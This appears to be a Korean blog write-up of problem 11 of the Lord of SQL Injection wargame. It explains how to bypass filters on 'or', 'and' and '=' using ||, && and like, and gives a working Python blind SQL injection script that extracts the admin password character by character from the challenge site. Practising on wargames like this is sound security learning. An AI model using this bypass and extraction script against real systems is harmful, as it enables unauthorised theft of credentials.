์ƒˆ์†Œ์‹

Game/los

Lord of sql injection [11]

  • -
๋ฐ˜์‘ํ˜•

 

[๋ฌธ์ œ 11๋ฒˆ]

 

์ฝ”๋“œ๋ฅผ ์‚ดํŽด๋ณด๋‹ˆ prob, _, . , () \๋“ฑ ๊ธฐ๋ณธ์ ์œผ๋กœ ๋ง‰๋Š”๊ฒƒ ๋ง๊ณ 

or and๋ฅผ ๋ง‰์•„๋†จ๋‹น. substr๋„ ๋ง‰์•„๋†“์€ ๊ฒƒ ๊ฐ™๋‹ค. (๊ทผ๋ฐ substr ์จ๋„ HeHe๊ฐ€ ์•ˆ๋œจ๋„ค์š” ?_?)

 

admin์˜ pw๋ฅผ ์ผ์น˜ ์‹œํ‚ค๋ฉด ํ†ต๊ณผ๋˜๋Š” ๋ฌธ์ œ์ธ ๊ฒƒ ๊ฐ™๋‹ค. ์•ฝ๊ฐ„ 8๋ฒˆ ๋ฌธ์ œ์— ๋ฐœ์ „ํ˜• ๋ฌธ์ œ๋ž„๊นŒ..

 

 

= ์„ ๋ง‰์•„๋†“์•˜๋„ค์š”. = ์€ like๋กœ ๋ฐ”๊ฟ”์ค„ ์ˆ˜ ์žˆ์–ด์š”!!!

 

'or' == || 

'and' == &&

'=' == like

 

์ด๋ ‡๊ฒŒ! ์šฐํšŒํ•ด์ฃผ์„ธ์š”!

 

์•„๊นŒ ๊ทธ ํŒŒ์ด์ฌ ์ฝ”๋“œ๋ฅผ ๊ทธ๋Œ€๋กœ ์“ฐ๋˜, or = ||, '=' = like๋กœ ๋ฐ”๊ฟ”์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค.

 

import requests
from bs4 import BeautifulSoup

query1 = "\' || substring(pw,%d,1) like %s #"
dbname = []
password = []

word = ['\'a\'', '\'b\'', '\'c\'', '\'d\'', '\'e\'', '\'f\'', '\'g\'',
        '\'h\'', '\'i\'', '\'j\'', '\'k\'', '\'l\'', '\'m\'', '\'n\'', '\'o\'', '\'p\'', '\'q\'', '\'r\'', '\'s\'',
        '\'t\'', '\'u\'', '\'v\'', '\'w\'', '\'x\'', '\'y\'', '\'z\'', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
#print("์ƒํƒœ ์ฝ”๋“œ : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋Š” DB ๊ธธ์ด ์•Œ์•„๋‚ด๊ธฐ.

print("######################data ๋ถ„์„ ์ค‘")

num = 1
while num <= 8:

    for src in word:
        dbname = [query1 % (num, src)]

        cookies = {'PHPSESSID': '27g5thpe9ib9v6o1vq12kvhpv6'}
        params = {'id': 'admin', 'pw': dbname}
        res = requests.get('https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php', params=params, cookies=cookies)
        code = res.text  # ์ „์ฒด ์ฝ”๋“œ
        search = "Hello admin"  # ์ฐธ์ผ์‹œ ๋‚˜์˜ค๋Š” ๊ฒฐ๊ณผ ๊ฐ’

        if search in code: #์ฝ”๋“œ์•ˆ์— ์ฐธ์ผ ์‹œ ๋‚˜์˜ค๋Š” ๊ฐ’์ด ๋“ค์–ด๊ฐ€ ์žˆ๋‹ค๋ฉด
            print("Data : ", src)
            password += src
            #print(dbname)
            break


    num = num+1

print("###########################์™„๋ฃŒ")
print('pwd : ', '_'.join(password))

 

์ด๋ ‡๊ฒŒ ์‹คํ–‰์‹œํ‚ค๋ฉด 

 

 

pw ๊ฒฐ๊ณผ๊ฐ€ ๋‚˜์˜ค๋„ค์š”.

 

 

Clear

๋ฐ˜์‘ํ˜•

'Game > los' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Lord of sql injection [13]  (0) 2020.09.12
Lord of sql injection [12]  (0) 2020.09.11
Lord of sql injection [10]  (0) 2020.09.11
Lord of sql injection [9]  (0) 2020.09.11
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.